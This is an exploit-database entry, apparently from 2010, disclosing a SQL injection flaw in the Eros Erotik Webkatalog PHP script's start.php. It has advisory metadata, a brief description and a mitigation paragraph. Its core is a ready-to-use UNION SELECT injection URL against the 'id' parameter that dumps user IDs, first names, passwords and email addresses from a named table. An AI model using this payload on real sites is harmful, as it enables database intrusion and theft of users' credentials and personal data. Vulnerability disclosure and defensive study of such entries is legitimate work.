Eros Erotik Webkatalog start.php (rubrik&id)SQL Injection

vendor:

start.php

by:

Easy Laster

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: start.php

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Eros Erotik Webkatalog start.php (rubrik&id)SQL Injection

A SQL injection vulnerability exists in the Eros Erotik Webkatalog start.php script, which allows an attacker to execute arbitrary SQL commands via the 'go' and 'id' parameters. An attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious SQL statements to the vulnerable script. This can allow the attacker to gain access to sensitive information such as usernames, passwords, and emails stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : Eros Erotik Webkatalog start.php (rubrik&id)SQL Injection
+Autor : Easy Laster
+Date   : 11.03.2010
+Script  : Eros Erotik Webkatalog
+Price : 07,13€
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/webkatalog/start.php?go=rubrik&id=
+Exploitable   : www.site.com/webkatalog/start.php?go=rubrik&id=-1+union+select+1,2,3,4,
5,6,7,8,9,concat(id,0x3a,vorname,0x3a,passwort,0x3,mail),11,12,13,14,15+from+php005_4_eintrag--
                                                                           ^^"table name"^^
-----------------------------------------------------------------------------------------